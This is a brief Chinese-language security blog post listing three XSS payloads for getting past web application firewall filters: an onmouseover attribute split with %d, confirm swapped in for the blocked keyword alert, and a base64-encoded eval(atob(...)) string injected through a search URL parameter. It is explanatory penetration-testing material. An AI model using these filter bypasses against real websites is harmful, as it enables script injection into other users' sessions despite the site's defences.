实例1,
WAF Filter: ”onmouseover” <input type=text name=firstname value=”Anna” onmouseover=alert(‘XSS within input field’) “> ByPass: %d <input type=text name=firstname value=”Anna”%donmouseover=alert(‘XSS within input field’) “>
实例2,WAF检测alert,因为很多自动检测工具用到这语句来测试XSS “ onmouseover=alert(‘XSS within input field’) or <input type=text name=firstname value=”Anna” onmouseover=alert(‘XSS within input field’) “> WAF keyword Filter:alert (some test tools use 'alert')
Bypass: 1,use confirm as the payload instead of “alert” 实例3, Encode to byPass Filter :“eval(atob(“encryptedcontent”))” /*“Y29uZmlybSgxKTs=” is base 64 encoded “confirm(1);”*/ URL:http://somesite.com/search?searchterm=%27);eval(atob(“Y29uZmlybSgxKTs=”));// Source: <script> ... var foo = escape(‘’);eval(atob(“Y29uZmlybSgxKTs=”));//’); ... </script>
参考:http://www.netspi.com |
-
上一篇: 一次靠运气成分的提权 - 网站安全 - 自学php
下一篇: cyask 前台xss与后台Getshell - 网站安全 - 自学php
还没有人抢沙发呢~